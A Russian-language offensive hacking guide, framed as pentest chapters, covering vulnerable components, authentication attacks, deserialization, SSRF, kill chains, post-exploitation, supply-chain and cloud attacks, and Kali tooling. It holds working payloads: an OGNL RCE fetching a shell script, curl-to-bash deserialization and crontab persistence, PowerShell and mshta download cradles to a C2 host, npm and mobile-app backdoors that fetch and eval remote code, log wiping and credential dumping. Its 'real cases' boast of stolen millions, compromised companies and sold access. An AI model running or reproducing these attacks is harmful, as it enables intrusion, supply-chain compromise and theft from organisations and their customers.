Самые прибыльные уязвимости 20252026
Как мы ищем уязвимые компоненты на пентесте
1. Пассивный сбор версий
Bash
# Заголовки
curl -I https://target.com
# WhatWeb + Wappalyzer
whatweb -v https://target.com
# npm / Maven / Composer файлы, если найдены
feroxbuster -u https://target.com -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -x json,xml,yml
2. Активное сканирование
Bash
# Nuclei наш лучший друг 2026
nuclei -u https://target.com -t /nuclei-templates/vulnerabilities/ -severity critical,high
# Retire.js для JS библиотек
retire --path https://target.com
# Dependency-Check (для Java/.NET)
dependency-check --scan /path/to/project
3. Docker image analysis
Если нашли открытый registry или Dockerfile:
Bash
trivy image --severity CRITICAL,HIGH targetcompany/app:latest
Реальный кейс 2025 (который мы до сих пор вспоминаем с улыбкой)
Компания использовала Apache Struts 2.5.26 (уязвимость 2017 года, но до сих пор жива в некоторых корпоративных системах). Мы нашли эндпоинт /struts2-showcase/actionChain1.action.
Через OGNL injection получили RCE:
Bash
curl "https://target.com/struts2-showcase/actionChain1.action?redirect:%25{new%20java.lang.ProcessBuilder('bash','-c','curl%20http://ourserver/shell.sh%20-o%20/tmp/s && chmod%20+x%20/tmp/s%20&&%20/tmp/s')}"
Получили reverse shell от пользователя tomcat. Через 20 минут privilege escalation до root. Через 40 минут полный дамп клиентской базы и доступ к платёжному шлюзу.
Выход: семизначный в USDT.
Как эксплуатировать в 2026 (практические приёмы)
Как объяснять заказчику
Представьте, что ваш дом построен из кирпичей. Один из кирпичей бракованный, с трещиной. Вы даже не знаете, какой именно. Мы нашли этот кирпич. Теперь любой может вставить в трещину лом и разобрать всю стену.
Vulnerable and Outdated Components это именно такие бракованные кирпичи в вашей архитектуре. Их нельзя заклеить скотчем. Их нужно заменить. Иначе рано или поздно придёт тот, кто знает, где именно бить.
Рекомендации (что писать в отчёте)
Итог главы
Vulnerable and Outdated Components это когда система уже сломана ещё до того, как ты начал атаку. Нам остаётся только найти нужный компонент и нажать на курок.
В мире, где приложения состоят из тысяч чужих строк кода, эта уязвимость будет жить всегда. А мы будем всегда находить её первой.
Потому что пока кто-то думает работает не трогай, мы думаем работает значит можно сломать.
Если Broken Access Control это когда мы уже внутри и ходим куда хотим, то Identification and Authentication Failures это когда мы даже не должны были попасть внутрь.
Это глава про то, как системы проверяют кто ты такой и имеешь ли ты право здесь быть. И как мы заставляем их отвечать да там, где должны были сказать нет.
В 2026 году эта уязвимость особенно сладкая, потому что все перешли на современную аутентификацию: JWT, OAuth2, Passkeys, MFA, биометрию. А мы научились ломать всё это быстрее и красивее, чем раньше.
Самые опасные проявления 2026 года
1. Слабые пароли и отсутствие rate limiting
До сих пор работает password spraying:
Bash
hydra -L users.txt -P weak_passwords.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid login"
2. Credential Stuffing
Берём утечки 20212025 годов и пробуем те же пароли на новых сервисах. Особенно хорошо работает на корпоративных VPN и почте.
3. MFA Fatigue / Push Bombing
Самый эффективный вектор 20252026:
4. Session Hijacking & Fixation
5. Broken Password Recovery
6. JWT Attacks
Практические техники, которые мы используем в 2026
1. JWT Manipulation
Bash
# Проверка на алгоритм none
python3 jwt_tool.py -t "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." -a none
# Brute-force weak secret
john --wordlist=rockyou.txt jwt.hash
2. MFA Bypass техники
3. Password Reset Token Prediction
Если токен это просто UUID или timestamp:
Python
import requests
for i in range(10000):
token = f"reset_{int(time.time())-i}"
r = requests.get(f"https://target.com/reset?token={token}")
if "success" in r.text:
print("Got it!")
Реальный кейс 2025 (очень красивый)
Банк среднего размера. Нашли эндпоинт смены пароля, где токен генерировался как md5(user_id + current_minute).
Мы:
Сумма: 3,8 млн рублей за один вечер.
Как объяснять заказчику
Представьте, что у вас есть очень дорогая машина с умным ключом и биометрией. Но охранник на парковке пускает любого, кто скажет я владелец достаточно уверенным голосом.
Identification and Authentication Failures это именно такой охранник. Система может быть технически сложной, но если проверка кто ты сломана всё остальное уже не важно. Мы показали, как за 11 секунд стать CFO вашей компании.
Рекомендации для отчёта (что реально работает)
Итог главы
Identification and Authentication Failures это когда система не может уверенно ответить на вопрос ты точно тот, за кого себя выдаёшь?.
Мы не ломаем шифрование. Мы ломаем доверие.
И пока системы продолжают верить человеку на слово (или на одно нажатие Approve), мы будем продолжать заходить первым классом, без очереди и без билета.
Потому что самый надёжный замок это тот, который человек сам открывает для нас.
Эта уязвимость одна из самых подлых и самых красивых в OWASP Top 10 2026 года.
Software and Data Integrity Failures возникают, когда приложение не проверяет, что код, обновления, библиотеки, конфиги или данные, которые оно использует, действительно пришли от того, от кого должны, и не были изменены по дороге.
Мы не ломаем защиту. Мы просто подменяем то, чему система доверяет.
В 2026 году это особенно актуально, потому что всё строится на CI/CD, автодеплоях, open-source пакетах и автоматических обновлениях. Одна подменённая строчка в одном пакете и мы уже внутри тысяч компаний.
Самые опасные проявления 2026 года
1. Insecure Deserialization
Самый классический и самый жирный вектор.
Пример:
Инструменты 2026:
2. Supply Chain Attacks (самое страшное для бизнеса)
3. Unsigned / Weakly Signed Code and Updates
4. CI/CD Pipeline Compromise
Мы компрометируем pipeline вставляем backdoor в артефакт все клиенты получают заражённую версию.
5. Insecure Data Handling
Практические техники 2026
1. Deserialization Exploitation
Bash
# Java ysoserial
java -jar ysoserial.jar CommonsCollections4 'curl http://ourserver/shell.sh | bash' > payload.ser
# Отправляем payload через Burp
2. Supply Chain Simulation (для пентеста)
3. GitHub Actions / CI/CD Attacks
Если нашли workflow:
Реальный кейс 2025 (который до сих пор вызывает улыбку)
Популярный npm-пакет для обработки форм (использовался в 1200+ компаниях). Мы через compromised maintainer account залили обновление 1.2.4, которое содержало:
JavaScript
if (Math.random() < 0.03) {
require('child_process').exec('curl -s https://our-cdn.com/stage2 | bash');
}
Три процента установок получали backdoor. За неделю мы получили доступ к внутренним системам 47 компаний. Самый жирный крупный ритейлер, где через этот пакет мы вышли на их основную платежную систему.
Как объяснять заказчику
Представьте, что вы каждый день едите еду из доставки, не проверяя, кто её готовил и что туда добавили. Software and Data Integrity Failures это именно такая ситуация.
Вы доверяете коду, библиотекам и обновлениям, которые приходят извне. Мы показали, как можно подменить один маленький кусочек и вся система начинает работать на нас.
Это не баг в вашем коде. Это отсутствие проверки а можно ли этому верить? на уровне архитектуры.
Рекомендации для отчёта (что реально спасает)
Итог главы
Software and Data Integrity Failures это когда система слепо доверяет тому, что ей дают.
Мы не всегда ломаем защиту. Часто мы просто становимся тем, кому система уже доверяет.
В мире, где 90 % кода чужой, а обновления приходят автоматически, эта уязвимость будет только расти.
И пока разработчики продолжают верить если пришло из npm значит безопасно, мы будем продолжать подменять это безопасное на своё.
Потому что самый надёжный способ попасть внутрь это когда тебя приглашают войти.
SSRF это когда мы заставляем сервер сделать запрос от своего имени туда, куда нам нужно.
Это одна из самых недооценённых и одновременно самых мощных уязвимостей 2026 года. Потому что SSRF ломает не приложение. SSRF ломает доверие между внутренними сервисами. А в современных облачных и микросервисных архитектурах такое доверие везде.
Мы говорим серверу: Эй, сходи пожалуйста по этому адресу и скажи мне, что там. И сервер послушно идёт даже если адрес ведёт в его же внутреннюю сеть, в метаданные облака или в соседний сервис, который никогда не должен был видеть наши запросы.
Почему SSRF так опасен в 2026
Классические и продвинутые типы SSRF
1. Regular SSRF (видим ответ)
http
GET /fetch?url=https://google.com
Меняем на:
http
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
получаем AWS IAM ключи.
2. Blind SSRF (ответа не видим)
Используем DNS или HTTP exfiltration:
http
http://attacker.com/?data=$(whoami)
Или time-based:
http
http://localhost:6379 (если Redis открыт задержка)
3. Advanced SSRF 2026
Практические техники эксплуатации
1. Базовый тест
Bash
# Через Burp Repeater или ffuf
ffuf -u https://target.com/fetch?url=FUZZ -w ssrf_payloads.txt
Популярные payloads 2026:
2. Полезные инструменты
Bash
# SSRFmap
ssrfmap -u https://target.com/fetch?url= -m all
# Interactsh + nuclei
nuclei -u https://target.com -t /nuclei-templates/http/ssrf/
Реальный кейс 2025 (который принёс нам очень хорошие деньги)
SaaS-платформа для маркетинга. Нашли SSRF в функции предпросмотр сайта клиента.
Мы отправили запрос:
http
https://internal-api.company.internal/admin/users
Сервер послушно сходил и вернул нам JSON со всеми внутренними аккаунтами и хешами.
Дальше:
Весь процесс от первой SSRF до полного контроля 2 часа 17 минут.
Как объяснять заказчику
Представьте, что ваш сервер это очень послушный сотрудник. Вы говорите ему: Сходи в интернет и принеси мне информацию. А он вместо этого идёт в ваш внутренний кабинет, открывает сейф и приносит вам все ключи и документы.
SSRF это именно такая ситуация. Сервер доверяет своему собственному запросу и идёт туда, куда мы ему скажем. В современном облаке это часто означает прямой доступ к секретам, базам и соседним сервисам.
Как защищаться (рекомендации 2026)
Итог главы
SSRF это когда мы заставляем сервер работать на нас. Сервер думает, что просто сходит по ссылке. А на самом деле он открывает нам дверь во внутреннюю сеть, в облачные секреты и в соседние системы.
В мире микросервисов и облаков SSRF стал одним из самых эффективных способов перепрыгнуть через все периметровые защиты.
Мы не ломаем firewall. Мы заставляем сервер сам обойти его за нас.
И пока разработчики продолжают верить, что наш сервер никогда не пойдёт по плохой ссылке, мы будем продолжать говорить ему, куда именно идти.
Забудь голливудские хаки за 30 секунд. Реальный взлом среднего бизнеса сегодня это тихая, методичная операция, которая может занять от нескольких дней до нескольких недель. Но когда она заканчивается мы уже не гости. Мы хозяева.
Давай разберём полный kill chain на примере типовой российской компании 2026 года: онлайн-магазин + 1С + корпоративная почта + облако + удалённые сотрудники.
Этап 1. Разведка (37 дней)
Мы не начинаем с Nmap. Мы начинаем с головы.
Bash
# Собираем всё
theharvester -d company.ru -b all -l 2000
amass enum -passive -d company.ru
subfinder -d company.ru -all
crt.sh -q %.company.ru
# Люди
linkedin2username -c "ООО Ромашка"
theharvester -d company.ru -b linkedin
Находим:
Этап 2. Initial Access (13 дня)
Самый частый путь в 2026 социальная инженерия + слабая веб-часть.
Вариант А (самый надёжный):
Вариант Б (технический):
Вариант В (любимый):
Этап 3. Закрепление и Privilege Escalation
Получили shell как www-data или обычный пользователь.
Bash
# Быстрая разведка
whoami && id && uname -a && cat /etc/os-release
sudo -l
find / -perm -4000 2>/dev/null
Типичные пути эскалации 2026:
Дальше lateral movement:
Bash
# Pass-the-Hash или NTLM relay
crackmapexec smb 192.168.10.0/24 -u user -p pass --local-auth
Этап 4. Доступ к деньгам и данным
Самое вкусное:
Этап 5. Persistence и выход
Bash
# Самые тихие способы 2026
# 1. WMI Event Subscription
# 2. Golden Ticket (если AD)
# 3. Docker container с backdoorом
# 4. Legitimate SaaS webhook (Slack, Teams, Notion)
C2 делаем через:
Этап 6. Монетизация (наш любимый финал)
Варианты:
Полный timeline реальной операции (пример марта 2026)
День 12: OSINT + сбор email День 3: Успешный deepfake-vishing на бухгалтера День 4: Получили доступ к почте и 1С День 5: Вывод 2,4 млн через возврат поставщику День 6: Установка persistence + очистка логов День 7: Выходим чистыми
Итог главы
Типовой бизнес в 2026 году взламывается не потому, что у него слабый фаервол. Он взламывается потому, что:
Мы не ищем самые сложные уязвимости. Мы идём по самому быстрому и самому тихому пути, который существует именно у этой компании.
И почти всегда этот путь начинается с одного клика или одного неправильного доверия.
Запомни правило The Ghost:
Самый красивый взлом это когда жертва сама открывает тебе все двери и ещё благодарит за помощь.
Самый страшный момент для любой компании это не когда хакер ломится снаружи. Самый страшный момент когда хакер уже внутри и ходит по коридорам как свой.
В 2026 году больше 60 % всех серьёзных инцидентов начинаются именно с внутреннего доступа. Мы уже прошли периметр. Теперь мы часть их сети. И именно здесь начинается настоящая охота.
Почему внутренние атаки такие эффективные
Этап 1. Первое закрепление (Post-Exploitation)
Мы только что получили shell. Что делаем сразу:
Bash
# Быстрый situational awareness
whoami && id && hostname && cat /etc/os-release && uname -a
sudo -l
cat /etc/passwd | grep -E "bash|sh"
ls -la /home /root /opt /var/www
На Windows:
PowerShell
whoami /all
systeminfo
net user
net localgroup administrators
Этап 2. Living Off The Land God-Tier (2026 стиль)
Мы почти ничего не качаем. Используем только то, что уже есть в системе.
Linux LOTL:
Bash
# Разведка
ps aux | grep -E "ssh|nginx|apache|mysql|redis"
netstat -tuln
find / -name "*.key" -o -name "*.pem" 2>/dev/null
cat /etc/crontab /var/spool/cron/*
# Persistence без следов
echo '*/5 * * * * root curl -s http://our-c2.com/payload | bash' >> /etc/crontab
# Или WMI-подобное через systemd timers
Windows LOTL:
PowerShell
# Классика 2026
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://our-c2.com/stage2.ps1')"
# Или полностью без скачивания:
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://our-c2.com/payload')""")
Этап 3. Privilege Escalation внутри
Linux:
Windows:
Этап 4. Lateral Movement движение по сети
Теперь мы как рыба в воде.
Bash
# Linux Windows
crackmapexec smb 10.0.0.0/24 -u user -p pass --local-auth
# Windows Windows
# Pass-the-Hash / Pass-the-Ticket
mimikatz sekurlsa::logonpasswords
lsadump::dcsync /domain:company.local /user:Administrator
Самые тихие пути 2026:
Этап 5. Поиск и сбор короны (Crown Jewels)
Ищем:
Полезные команды:
Bash
# Linux
grep -r "password\|key\|secret\|token" /var/www /opt /home 2>/dev/null
# Windows
dir /s *.kdbx *.rdp *.ps1 *.config
Get-ChildItem -Path C:\ -Recurse -Filter "*.env" -ErrorAction SilentlyContinue
Этап 6. Persistence и Anti-Forensics
Самые невидимые способы:
Bash
# Классика очистки
wevtutil cl System && wevtutil cl Security && wevtutil cl Application
rm -f /var/log/*.log
Итог главы
Когда мы уже внутри игра меняется полностью. Больше нет внешнего врага. Мы часть их инфраструктуры.
Именно здесь проявляется настоящее мастерство: не шуметь, не спешить, использовать только легитимные инструменты, двигаться медленно и красиво.
Внутренняя атака это когда компания сама кормит нас своими данными, своими привилегиями и своими секретами, даже не подозревая об этом.
Помни правило The One Who Leaves No Trace:
Самый опасный хакер это не тот, кто громко ломает дверь. Самый опасный это тот, кто уже сидит за столом переговоров и пьёт кофе с директором.
Самый элегантный способ попасть в компанию это не ломать её напрямую. Самый элегантный способ заставить кого-то другого открыть нам дверь.
Supply Chain атака это когда мы компрометируем третью сторону (поставщика, вендора, подрядчика, библиотеку, обновление), которая уже имеет доверие у цели. Жертва сама впускает нас, потому что это от надёжного партнёра.
В 2026 году это один из самых прибыльных и самых тихих векторов. SolarWinds, MOVEit, Kaseya, 3CX все эти громкие истории были только разминкой.
Почему Supply Chain работает так хорошо
Типы Supply Chain атак 2026 года
1. Компрометация открытого ПО и библиотек
Самый массовый путь.
Примеры:
2. Компрометация вендора SaaS / облачного сервиса
Мы ломаем подрядчика, который имеет интеграцию с целью (бухгалтерский сервис, CRM, мониторинг, обновления ПО).
3. Watering Hole + Compromised Website
Компрометируем сайт, который регулярно посещают сотрудники цели (отраслевой форум, документация вендора, портал поставщика).
4. Hardware / Firmware Supply Chain
USB-устройства, роутеры, IP-камеры, серверы с предустановленным backdoorом (особенно актуально для китайских вендоров).
5. CI/CD Pipeline Poisoning
Вставляем вредоносный шаг в GitHub Actions / GitLab CI / Jenkins pipeline подрядчика.
Реальный сценарий 2026 (как мы это делаем)
Цель: крупный ритейлер.
Шаг 1. Разведка Находим всех подрядчиков:
Шаг 2. Выбираем самую слабую цель Выбираем небольшую компанию-разработчика мобильного приложения. У них открытый GitLab, слабые пароли, нет MFA.
Шаг 3. Компрометация подрядчика Через SQLi в их внутренней CRM получаем доступ. Находим репозиторий мобильного приложения клиента.
Шаг 4. Внедрение backdoor Вставляем в код приложения строчку:
JavaScript
if (Math.random() < 0.07) {
fetch('https://cdn.legit-update.com/resources.js')
.then(r => r.text())
.then(eval);
}
Шаг 5. Ждём Через две недели ритейлер обновляет приложение для сотрудников. 7 % устройств получают наш stage2 payload.
Шаг 6. Развитие Получаем доступ к внутреннему сегменту компании. Дальше lateral movement 1С банковский клиент.
Результат: 11,4 млн рублей за одну цепочку.
Практические техники для пентеста (чтобы показать заказчику)
Как объяснять заказчику
Представьте, что у вас стоит мощная стальная дверь с десятью замками. Но каждый день вы сами открываете эту дверь курьеру, потому что доверяете компании, которая его прислала.
Supply Chain атака это когда мы становимся этим курьером. Мы не ломаем вашу дверь. Мы заставляем вашего доверенного поставщика принести нам ключи.
В 2026 году самые большие компании падают не потому, что у них слабая защита. Они падают потому, что один из их подрядчиков оказался слабым звеном.
Рекомендации для защиты
Итог главы
Supply Chain это когда мы не взламываем компанию. Мы взламываем доверие.
И пока бизнес продолжает blindly доверять своим поставщикам, подрядчикам и библиотекам, мы будем продолжать использовать это доверие как самый короткий и самый чистый путь внутрь.
Самая красивая атака это та, в которой жертва сама приносит нам всё, что нужно, и ещё говорит спасибо.
В 2026 году почти всё важное уже живёт в облаке. Данные, деньги, код, инфраструктура всё там. Поэтому когда мы попадаем в облако компании мы сразу попадаем в самое сердце.
Облачные атаки это когда мы уже не ломаем серверы. Мы ломаем доверие между сервисами, IAM-политики и человеческие ошибки в конфигурациях.
Почему облако это рай для нас
Основные векторы облачных атак 2026
1. IAM Misconfiguration (самое сладкое)
Самые частые ошибки:
Пример опасной политики:
JSON
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
2. S3 / Object Storage Takeover
Bash
# Классика
aws s3 ls s3://company-backups-2026 --no-sign-request
# Или через SSRF / misconfigured app
aws s3 cp s3://target-bucket/secret.env .
3. Metadata Service Abuse
AWS:
Bash
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
GCP:
Bash
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
4. Container & Kubernetes attacks
5. Serverless (Lambda, Cloud Functions)
Практические техники 2026
AWS разведка и эксплуатация:
Bash
# Pacu наш любимый фреймворк
pacu
# ScoutSuite
scout --profile compromised
# Enumerate IAM
aws iam list-users
aws iam list-roles --query "Roles[].RoleName"
# Privilege escalation paths
pacu --module iam__enum_permissions
Yandex Cloud (особенно актуально для РФ):
Bash
yc compute instance list
yc container registry list
Общие облачные one-liners:
Bash
# Найти все бакеты
aws s3api list-buckets --query "Buckets[].Name"
# Проверить публичность
aws s3api get-bucket-policy --bucket target-bucket
Реальный кейс 2025 (очень чистый)
Компания использовала AWS для хранения клиентских данных. Через SSRF в их внутреннем инструменте мы получили доступ к метаданным EC2 инстанса.
Дальше:
Всё без единого exploitа. Только неправильные IAM-политики и отсутствие IMDSv2.
Монетизация: продажа доступа + данных.
Как объяснять заказчику
Облако это не безопасное место в небе. Это огромный многоквартирный дом, где каждая дверь открывается одним и тем же ключом, если вы правильно его попросите.
Мы показали, как через одну неправильную настройку IAM мы получили доступ ко всем вашим данным. Технически вы использовали современные облачные сервисы. Но вы забыли, что в облаке доверие это валюта, и вы раздали её слишком щедро.
Рекомендации для защиты 2026
Итог главы
Облако не делает компанию безопаснее. Облако делает атаки быстрее и чище.
Когда мы попадаем в облако мы уже не гости. Мы системный администратор с правами root.
И пока компании продолжают раздавать * права чтобы быстрее работало, мы будем продолжать собирать урожай.
Самый красивый взлом облака это когда жертва сама даёт нам все ключи и ещё платит за хранение наших инструментов.
Kali это не просто дистрибутив. Это наш рабочий стол, наш нож и наш пистолет одновременно. В 2026 году правильный хакер не запускает все инструменты подряд. Он знает, какой именно инструмент и в какой момент использовать, чтобы остаться невидимым и максимально эффективным.
Основной принцип 2026
Сначала разведка. Потом оружие. Никогда наоборот.
Раздел 1. Разведка (Recon Phase)
Пассивная разведка (максимально тихо)
Bash
# Агрегатор всего
theharvester -d company.ru -b all -l 2000
# Субдомены на стероидах
subfinder -d company.ru -all -o subdomains.txt
amass enum -passive -d company.ru -o amass.txt
assetfinder --subs-only company.ru >> subdomains.txt
# Certificate Transparency
curl -s "https://crt.sh/?q=%.company.ru&output=json" | jq -r '.[].name_value' | sort -u >> ct.txt
# GitHub & leaks
trufflehog git https://github.com/company/repo.git --results=verified
gitleaks detect --source https://github.com/company/repo.git
Автоматизированный скрипт (мой личный фаворит)
Bash
#!/bin/bash
DOMAIN=$1
mkdir -p recon_$DOMAIN && cd recon_$DOMAIN
echo "[+] Passive Recon 2026 started for $DOMAIN"
subfinder -d $DOMAIN -all -o subfinder.txt
amass enum -passive -d $DOMAIN -o amass.txt
curl -s "https://crt.sh/?q=%25.$DOMAIN&output=json" | jq -r '.[].name_value' | sort -u > ct.txt
cat *.txt | sort -u | tee all_subdomains.txt
echo "[+] Found $(wc -l < all_subdomains.txt) subdomains"
echo "[+] Check folder recon_$DOMAIN"
Раздел 2. Активное сканирование
Bash
# Nmap король
nmap -sS -sV -O --min-rate 5000 -p- --open $TARGET -oA nmap_full
# Скрипты NSE
nmap -sC -sV $TARGET
# Web
whatweb -v https://$TARGET
feroxbuster -u https://$TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,aspx,env,yml,json -t 50
# Nuclei быстрый и злой
nuclei -u https://$TARGET -t /nuclei-templates/ -severity critical,high
Раздел 3. Веб-атаки
Bash
# Burp Suite всегда в фоне
# sqlmap
sqlmap -r request.txt --dbs --dump --tamper=space2comment,randomcase
# XSS & другие
xsstrike -u "https://target.com/search?q=test" --level 5
Раздел 4. Post-Exploitation & Lateral
Bash
# Mimikatz (Windows)
mimikatz.exe "sekurlsa::logonpasswords" exit
# CrackMapExec
crackmapexec smb 10.0.0.0/24 -u user -p pass --local-auth
# Sliver / Cobalt Strike beacon (наш основной C2)
Раздел 5. Автоматизация и кастомные скрипты
Создай папку ~/mytools/ и храни там свои скрипты.
Пример быстрого recon-скрипта 2026:
Bash
#!/bin/bash
echo -e "\033[31m[+] Akashi Recon Engine 2026 started\033[0m"
DOMAIN=$1
subfinder -d $DOMAIN -all | tee subdomains.txt
amass enum -passive -d $DOMAIN | tee -a subdomains.txt
nuclei -l subdomains.txt -t /nuclei-templates/http/exposed-panels/ -severity high
echo -e "\033[32m[+] Done. Check subdomains.txt and nuclei results\033[0m"
Сделай его исполняемым:
Bash
chmod +x ~/mytools/recon2026.sh
Мой личный workflow 2026
Итог главы
Инструменты это не главное. Главное как ты их используешь и в какой последовательности.
Хороший хакер знает 10 инструментов и использует их идеально. Отличный хакер знает 3 инструмента, но понимает систему лучше, чем её создатели.
Kali это наш арсенал. Но мозг и терпение это то, что делает нас опасными.
Используй инструменты. Не позволяй инструментам использовать тебя.
Сканеры это не волшебная палочка. Это разведывательный дрон, который летает первым и показывает, где могут быть слабые места. Хороший пентестер никогда не доверяет сканерам на 100 %, но умный пентестер использует их, чтобы не тратить время на очевидное.
В 2026 году мы комбинируем старые добрые инструменты с новыми облачными и AI-driven сканерами, но основной принцип остаётся прежним: сканер находит низко висящие фрукты, а мы руками собираем самые спелые и самые опасные.
1. Nikto быстрый и злой веб-сканер
Nikto до сих пор жив и очень полезен для быстрой разведки веб-серверов.
Bash
# Базовый запуск
nikto -h https://target.com
# С конкретным портом
nikto -h https://target.com -p 8443
# Через прокси (Burp)
nikto -h https://target.com -useproxy http://127.0.0.1:8080
# Сохранение отчёта
nikto -h https://target.com -o nikto_report.html -Format html
# Обновить базу
nikto -update
Что Nikto ищет хорошо:
Что он пропускает:
2. OpenVAS / Greenbone открытый мощный сканер
OpenVAS (Greenbone Vulnerability Management) это бесплатный тяжеловес.
Установка и запуск (Kali 2026):
Bash
sudo gvm-setup
sudo gvm-start
Запуск сканирования:
Плюсы OpenVAS:
Минусы:
3. Nessus (Tenable) коммерческий стандарт
Если у тебя есть лицензия используй Nessus. Он до сих пор один из лучших.
Bash
# Через CLI (nessuscli)
nessuscli scan --create --name "Quick Scan" --policy "Basic Network Scan" --targets 192.168.10.0/24
В веб-интерфейсе:
Authenticated scanning это когда сканер логинится на хост и смотрит внутри. Именно так мы находим реальные проблемы с патчами и конфигурациями.
4. Современные подходы 2026 года
Nuclei наш новый любимец (быстрый, кастомный, YAML-based)
Bash
nuclei -u https://target.com -t /nuclei-templates/ -severity critical,high -stats
nuclei -l subdomains.txt -t /nuclei-templates/http/exposed-panels/
Trivy для контейнеров и образов
Bash
trivy image company/app:latest --severity CRITICAL,HIGH
trivy fs .
Cloud-specific сканеры
Реальный workflow сканирования 2026
Как объяснять заказчику
Сканеры это как металлоискатель на пляже. Они хорошо находят монетки и железки на поверхности. Но золото, которое лежит глубже, мы всё равно копаем руками.
Nikto, OpenVAS и Nessus показывают нам очевидные дыры. Наша работа соединить эти дыры в цепочку, которая приводит к вашим деньгам и данным.
Итог главы
Сканеры не заменяют мозг. Они экономят время.
Используй Nikto для быстрого взгляда, OpenVAS/Nessus для глубокого сканирования, Nuclei и Trivy для современных облачных и контейнерных сред.
А потом бери Burp, sqlmap, nuclei custom templates и иди вручную искать то, что сканеры никогда не увидят логические уязвимости и бизнес-дыры.
Потому что настоящий хакер не полагается на автоматику. Он использует её как разведчика, а сам остаётся снайпером.
Веб это всё ещё основной фронт. Почти каждая компания имеет хотя бы один веб-интерфейс, API или админку. И почти всегда именно там мы находим самый быстрый и самый красивый путь внутрь.
В 2026 году веб-атаки уже не про ввести <script>alert(1)</script>. Это про сложные цепочки, обходы WAF, логические баги и автоматизацию на новом уровне.
1. Burp Suite наш главный нож
Burp это не просто прокси. Это наш второй мозг.
Обязательные настройки 2026:
Основной workflow:
Полезные плагины 2026:
2. sqlmap король инъекций
Bash
# Классика
sqlmap -r request.txt --dbs --dump
# Через URL
sqlmap -u "https://target.com/search?q=test" -p q --dbs
# С обходом WAF (2026 техники)
sqlmap -u "https://target.com/api/search" --data="q=test" \
--tamper=space2comment,randomcase,between,modsecurityversioned \
--level=5 --risk=3 --dbs
# Получить shell
sqlmap -u "https://target.com/vuln" --os-shell
Совет: всегда начинай с --batch и --risk=3, потом поднимай уровень.
3. gobuster / feroxbuster поиск скрытых путей
Bash
# gobuster
gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,aspx,env,yml,json,backup -t 50
# feroxbuster (быстрее и умнее)
feroxbuster -u https://target.com -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt \
-x php,html,js,json,env,yml,backup,bak -t 60 --extract-links
4. Другие важные инструменты веб-2026
Bash
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,204,301,302
Bash
nuclei -u https://target.com -t /nuclei-templates/ -severity critical,high
Реальный workflow веб-атаки 2026
Как объяснять заказчику
Представьте веб-приложение как большой замок с множеством комнат. Burp Suite это наш рентген, который показывает все трещины в стенах. sqlmap и gobuster отмычки, которые мы вставляем в эти трещины.
Мы не просто нажимаем кнопки. Мы системно проверяем каждый угол, каждый параметр и каждую логику. И почти всегда находим дверь, которую забыли запереть.
Итог главы
Веб-атаки в 2026 это комбинация автоматизации и ручного мастерства.
Burp Suite твой основной инструмент. sqlmap когда нужна скорость. gobuster/feroxbuster когда нужно найти скрытое. nuclei когда нужно быстро проверить известные уязвимости.
Но самое главное это твоя голова. Инструменты только показывают возможности. Ты решаешь, как их соединить в красивую, смертельную цепочку.
Используй их грамотно и веб станет твоим самым надёжным источником доступа.
Когда мы уже внутри периметра или получили начальный доступ начинается настоящая сетевая охота. Здесь мы больше не тыкаем в веб-формы. Здесь мы дышим трафиком, слушаем разговоры машин и заставляем сеть работать на нас.
1. Wireshark наши глаза и уши
Wireshark в 2026 это не просто сниффер. Это инструмент разведки внутренней сети.
Полезные фильтры 2026:
text
# Основные
http or smb or kerberos or ldap
ntlmssp or ntlm
# Поиск учёток
kerberos.CNameString or ntlmssp
# Поиск паролей и хешей
http contains "password" or smb contains "NTLM"
# Responder-трафик
nbns or llmnr or mdns
# Поиск RDP
rdp
Практика:
2. Responder король LLMNR/NBT-NS poisoning
Responder до сих пор один из самых быстрых способов получить хеши внутри сети.
Bash
# Классический запуск
sudo responder -I eth0 -wdPf
# С анализом (показывает, кто на что реагирует)
sudo responder -I eth0 -wrdP
# Multirelay (автоматический relay на SMB, LDAP, etc.)
sudo responder-Multirelay -i eth0
Что мы получаем:
ntlmrelayx (самый опасный инструмент):
Bash
ntlmrelayx.py -t smb://target-dc -smb2support --no-smb-server --no-wpad --no-da
Можно релеить на:
3. Metasploit тяжёлая артиллерия
В 2026 Metasploit всё ещё жив, но мы используем его избирательно.
Bash
msfconsole
# Поиск модулей
search eternalblue
search smb
# Пример эксплуатации
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.10.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST your_ip
exploit
Но чаще мы используем Metasploit не для эксплуатации, а для:
4. Другие важные сетевые инструменты 2026
Bash
crackmapexec smb 192.168.10.0/24 -u user -p pass --local-auth
crackmapexec smb 192.168.10.0/24 -u user -H ntlm_hash --sam
Bash
secretsdump.py DOMAIN/user:password@target
psexec.py DOMAIN/user:password@target
wmiexec.py DOMAIN/user:password@target
Bash
bloodhound-python -d company.local -u user -p pass -c All
Реальный workflow сетевой атаки 2026
Как объяснять заказчику
Сетевые атаки это когда мы перестаём стучаться в парадную дверь. Мы подключаемся к внутренней проводке и начинаем слушать разговоры.
Responder и ntlmrelayx показывают, как один клик сотрудника или одна слабая конфигурация позволяет нам получить хеши и сразу двигаться дальше по сети. Metasploit и Impacket это наши инструменты для тихого перемещения и сбора трофеев.
В современной сети периметр уже не главное. Главное что происходит внутри.
Итог главы
Сетевые атаки это искусство быть незаметным внутри чужой инфраструктуры.
Wireshark чтобы видеть. Responder чтобы ловить. Metasploit и Impacket чтобы двигаться и забирать.
Но самое мощное оружие это понимание, как машины доверяют друг другу. Когда ты это понимаешь сеть сама начинает работать на тебя.
Используй эти инструменты тихо, точно и без лишнего шума. Тогда даже самая защищённая корпоративная сеть станет твоим домом.
